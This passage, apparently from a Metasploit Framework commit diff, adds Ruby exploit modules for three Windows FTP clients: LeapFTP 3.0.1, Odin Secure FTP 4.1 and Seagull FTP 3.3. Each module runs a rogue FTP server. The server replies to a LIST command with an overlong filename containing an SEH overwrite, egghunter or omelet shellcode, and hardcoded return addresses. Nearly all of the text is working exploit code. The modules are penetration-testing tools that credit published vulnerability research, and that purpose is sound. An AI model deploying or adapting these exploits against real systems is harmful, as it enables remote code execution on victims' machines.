#---------------------------------------------------------------------------------
def setup
super
badchars = "\x00\xff\x0d\x5c\x2f\x0a"
eggoptions =
{
:checksum => true,
:eggtag => "W00T"
}
@hunter,@egg = generate_egghunter(payload.encoded,badchars,eggoptions)
enchunter = Msf::Util::EXE.encode_stub(framework, [ARCH_X86], @hunter, ::Msf::Module::PlatformList.win32, badchars)
@hunter = enchunter
end
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_pass(c,arg)
c.put("230 OK #{@egg}\r\n")
return
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
#Setup for the shellcode
offset_to_nseh = target['Offset']
jmpback = "\xeb\x8d\xfe\xff\xff"
nseh = "\xeb\xf9\x41\x41"
seh = [target.ret].pack('V')
strfile = "A" * (offset_to_nseh-@hunter.length-5)
strfile << @hunter
strfile << jmpback
strfile << nseh
strfile << seh
print_status(" - Sending directory list via data connection")
dirlist = "-rw-rw-r-- 1 1176 1176 1060 Apr 23 23:17 #{strfile}.txt\r\n\r\n"
conn.put(dirlist)
conn.close
print_status(" - Payload sent, wait for hunter...")
return
end
end

101
modules/exploits/windows/ftp/leapftp_list_reply.rb Normal file
View File

@ -0,0 +1,101 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'LeapFTP 3.0.1. SEH Overwrite',
'Description' => %q{
This module exploits a SEH overwrite in the LeapFTP 3.0.1 client
triggered when a file with a long name is downloaded/opened.
},
'Author' =>
[
'corelanc0d3r', # Original bug, completed MSF module
'nullthreat' # Ported PoC to MSF
],
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Offset' => 528,'Ret' => 0x0042A8A8 } ], # ADD ESP,64, POP EBX, RET :) boy I love pvefindaddr
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))
end
def setup
super
end
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
# create the egg hunter
badchars = ""
eggoptions =
{
:checksum => true,
:eggtag => "W00T"
}
hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)
# Get the file ready
junk = "\x73\x65" #73 65 = jump over filename = "se"
junk << "cret admin passwords.txt"
junk << "_" * ((target['Offset'])-junk.length-hunter.length) # _ = POP EDI
junk << hunter
seh = [target.ret].pack('V')
shellcode = egg + egg + payload.encoded
junk2 = rand_text_alpha((2000 - shellcode.length))
payload = junk + seh + shellcode + junk2
strfile = payload
print_status(" - Sending directory list via data connection")
dirlist = "-rw-rw-r-- 1 1176 1176 1060 Aug 16 22:22 #{strfile}.txt\r\n"
conn.put("total 2\r\n"+dirlist)
conn.close
return
end
end

105
modules/exploits/windows/ftp/odin_list_reply.rb Normal file
View File

@ -0,0 +1,105 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)',
'Description' => %q{
This module exploits a stack buffer overflow in Odin Secure FTP 4.1, triggered when processing the response on a LIST command. During the overflow, a structured exception handler record gets overwritten.
},
'Author' =>
[
'rick2600', #found the bug
'corelanc0d3r', #wrote the exploit
],
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",
},
'Platform' => 'win',
'Targets' =>
[
[ 'XP SP3 Universal', { 'Offset' => 264, 'Ret' => 0x10077622 } ], # ppr [appface.dll]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))
end
def setup
super
end
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
badchars = ""
eggoptions =
{
:checksum => true,
:eggtag => "W00T"
}
hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)
badchars = "\x00\xff\x0d\x5c\x2f\x0a"
hunterenc = Msf::Util::EXE.encode_stub(framework, [ARCH_X86], hunter, ::Msf::Module::PlatformList.win32, badchars)
offset_to_nseh=target['Offset']
jmpback = "\xe9\x9c\xff\xff\xff"
nops = "A" * 30
filename = "A" * (offset_to_nseh-hunterenc.length-jmpback.length)
nseh = "\xeb\xf9\x42\x42"
seh = [target.ret].pack('V')
junk2 = "A" * 4000
buffer = filename + hunterenc + jmpback + nseh + seh + junk2 + egg
print_status(" - Sending directory list via data connection")
dirlist = "-rw-rw-r-- 1 1176 1176 1060 Aug 16 22:22 #{buffer}\r\n"
conn.put(dirlist)
conn.close
print_status(" - Payload sent, wait for hunter...")
return
end
end

116
modules/exploits/windows/ftp/seagull_list_reply.rb Normal file
View File

@ -0,0 +1,116 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Omelet
def initialize(info = {})
super(update_info(info,
'Name' => 'Seagull FTP v3.3 build 409 Client',
'Description' => %q{
This module exploits a SEH overwrite in the Seagull FTP client that gets triggered
when the ftp clients processes a response to a LIST command. If the response contains
an overly long file/folder name, a buffer overflow occurs, overwriting a structured
exception handler..
},
'Author' =>
[
'corelanc0d3r' # found bug, wrote the exploit
],
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => '\x00',
'StackAdjustment' => -1500,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'XP Universal', { 'Offset' => 232, 'Ret' => 0x7CE4650C } ], # jmp esp shell32.dll
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))
end
#---------------------------------------------------------------------------------
def setup
super
end
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
print_status("Handling LIST command")
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
crash = "A" * target['Offset']
crash << [target.ret].pack('V')
#corelanc0d3r's omelet mixin
thepayload = ("\x90" * 30) + payload.encoded
omeletoptions =
{
:eggsize => 123,
:eggtag => "00w",
:searchforward => true,
:reset => false,
:checksum => true
}
badchars = '\x00'
omelet = generate_omelet(thepayload,badchars,omeletoptions)
omeletcode = omelet[0]
print_status("[+] Omelet code : #{omeletcode.length} bytes")
print_status("[+] Number of eggs : #{omelet[1].length}")
print_status("[+] Sending payload")
crash << ("\x90" * 30) + omeletcode
print_status(" - Sending directory list via data connection")
dirlist = ""
omelet[1].each do |thischunk|
print_status(" [+] Planted egg of #{thischunk.length} bytes")
dirlist << "drwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{thischunk}\r\n"
end
dirlist << "drwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{crash}\r\n"
conn.put("total #{omelet[1].length+1}\r\n"+dirlist)
conn.close
print_status(" - Wait for omelet hunter...")
return
end
end